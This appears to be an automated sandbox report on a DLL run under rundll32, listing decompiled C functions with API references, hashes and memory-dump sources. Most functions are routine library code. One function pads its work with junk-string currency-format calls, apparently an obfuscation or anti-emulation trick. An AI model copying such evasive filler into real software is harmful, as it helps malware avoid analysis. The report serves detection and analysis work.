							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001260( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1001FC9C(_t56);
			}

APIs

__EH_prolog3.LIBCMT ref: 100143D0
SendMessageA.USER32 ref: 10014448
GetBkColor.GDI32(?), ref: 10014451
GetTextColor.GDI32(?), ref: 1001445D
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 100144EF

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction ID: aaf9ea3742fe6bc6e7247e3e7f83f19f993380783e2d83981db4afd0f75aeedd
Opcode Fuzzy Hash: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction Fuzzy Hash: 1541457450074ADFCB20CF64C884A9EB3B0FF08310B128919F89A9F2B2DB74E890DB51

Uniqueness

Uniqueness Score: -1.00%

Function 100071AD Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100071AD(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10045580; // 0x2ef01728
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1001FBF7(E1003305F, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E1000563B(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E100071AD(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001260( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1001FBB5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 100071CC
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 100071EB
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10007209
RegDeleteKeyA.ADVAPI32(?,?), ref: 10007284
RegCloseKey.ADVAPI32(?), ref: 1000728F

Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction ID: 857dbc2a6ce260c152275e15a4f46308dc9617d79fc9f0d391124e600494f057
Opcode Fuzzy Hash: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction Fuzzy Hash: 2A21D075D0425A9FEB25DB64CD41AEEB7B0FF08390F10422AED55AB290DB345E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA34 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BA34(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FE50(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,10015D46,?,00000000,0000001C,100166B4,?,?,?,?,?), ref: 1001BA44
GetDeviceCaps.GDI32(?,00000058), ref: 1001BA7E
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BA87

Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE90
Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FEAD

MulDiv.KERNEL32(?,000009EC,00000060), ref: 1001BAAB
MulDiv.KERNEL32(00000000,000009EC,?), ref: 1001BAB6

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction ID: 22d9993a61e9b7a788ac8545e9176f77a0c9c7fd087465b0058942df5384f877
Opcode Fuzzy Hash: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction Fuzzy Hash: D411E131600A14EFDB22AF55CC85D0EBBE9EF89750B124419FA829B361CB72ED41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BAC2 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BAC2(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FDE7(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,10015D8A,?,?,?,?,?,?), ref: 1001BAD2
GetDeviceCaps.GDI32(?,00000058), ref: 1001BB0C
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BB15

Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE27
Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE44

MulDiv.KERNEL32(?,00000060,000009EC), ref: 1001BB39
MulDiv.KERNEL32(00000000,?,000009EC), ref: 1001BB44

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction ID: 64b43f4f01bdcb0d49ba4a6e9a36d092bff00c01b953ac3af172aaf16eee57d7
Opcode Fuzzy Hash: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction Fuzzy Hash: CF11AC35600A14AFEB22AF56CC85C1EBBF9EF89750B124419FA829B761C771ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10011005 Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10011005(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10045580; // 0x2ef01728
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E10004E6E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10020F40(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1001FBB5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

APIs

lstrlenA.KERNEL32(?), ref: 1001102F
_memset.LIBCMT ref: 1001104C
GetWindowTextA.USER32 ref: 10011066
lstrcmpA.KERNEL32(00000000,?), ref: 10011078
SetWindowTextA.USER32(?,?), ref: 10011084

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction ID: 10167af52a95b6190f72f3b34ec66ed1a7e9255054ff2824fd61587a0385250f
Opcode Fuzzy Hash: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction Fuzzy Hash: 22018476A01268ABE712DB64CCC4BDF77ACEB59780F014065F946DB142EAB1DEC48760

Uniqueness

Uniqueness Score: -1.00%

Function 10008551 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10008551(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100083A5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1002291E(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100482f0(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000858F
GetSystemMetrics.USER32 ref: 100085A7
GetSystemMetrics.USER32 ref: 100085AE

Strings

DISPLAY, xrefs: 100085CB

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: DISPLAY
API String ID: 3136151823-865373369
Opcode ID: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction ID: ce2e2f080287dd97aac08b6d54948a152684e982f167b1d142294c492be0e5a9
Opcode Fuzzy Hash: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction Fuzzy Hash: 9B119471901624ABEB56DF648C8465B7BA9FF05781F118052FD45AE04AD271DB00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA02 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000BA02(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10011382(__ebx, _t25, __ebp, 0xc);
				_push(E1000AEB0);
				_t26 = E10010657(__ebx, 0x10048470, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E10004E6E(_t21, 0x10048470, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E100113EF(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E100094FA(_t21, 0x10048470, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
Part of subcall function 10011382: InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
Part of subcall function 10011382: LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10010657: __EH_prolog3_catch.LIBCMT ref: 1001065E

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000BA46
FreeLibrary.KERNEL32(?), ref: 1000BA56

Strings

hhctrl.ocx, xrefs: 1000BA2A
HtmlHelpA, xrefs: 1000BA40

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction ID: fae18e8e3df8c99190cd81beb17d79f1be991ccf9ce49b00c1c0f37f4cd6cf67
Opcode Fuzzy Hash: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction Fuzzy Hash: 97018135204B03AFE322DF60DD05B4F7AD0EF457D1F018818F19AA5565DB30E9409623

Uniqueness

Uniqueness Score: -1.00%

Function 100030AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030AA(intOrPtr _a4, intOrPtr _a8) {
				signed int _t7;
				short* _t20;

				_t20 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t7 = GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return E10020530( *((intOrPtr*)(_a4 + _t7 *  *0x100440d0 * 8)),  *((intOrPtr*)(_a8 + GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 8)));
			}

0x100030c0
0x100030ce
0x1000310d

APIs

GetCurrencyFormatW.KERNEL32 ref: 100030CE
GetCurrencyFormatW.KERNEL32 ref: 100030EE

Strings

xadqsavcbdfewescGADW, xrefs: 100030B9, 100030E0
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100030C0, 100030C5

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction ID: 846c07d914ee6a27032255a918b4843dc12a0f64b55843b4788eb39cb2351f94
Opcode Fuzzy Hash: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction Fuzzy Hash: 7BF0B4312443197FE205D740EC82F927B5DD78A745F010056F700AF0E2CB6338248FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002BDD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E1002BDD1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10039fd0;
					_v28 =  *0x10039fc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1002361A), ref: 1002BDD6
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1002BDE6

Strings

IsProcessorFeaturePresent, xrefs: 1002BDE0
KERNEL32, xrefs: 1002BDD1

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction ID: e32e5489c0f8680f0bdbeaaa6a49d62586903b2bdf2b5a8f28566646894aba65
Opcode Fuzzy Hash: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction Fuzzy Hash: 94F03A20A00E1ADAEF01ABA1AD492EF7BB8FB84746F9245A0D592E4099EF318074D251

Uniqueness

Uniqueness Score: -1.00%

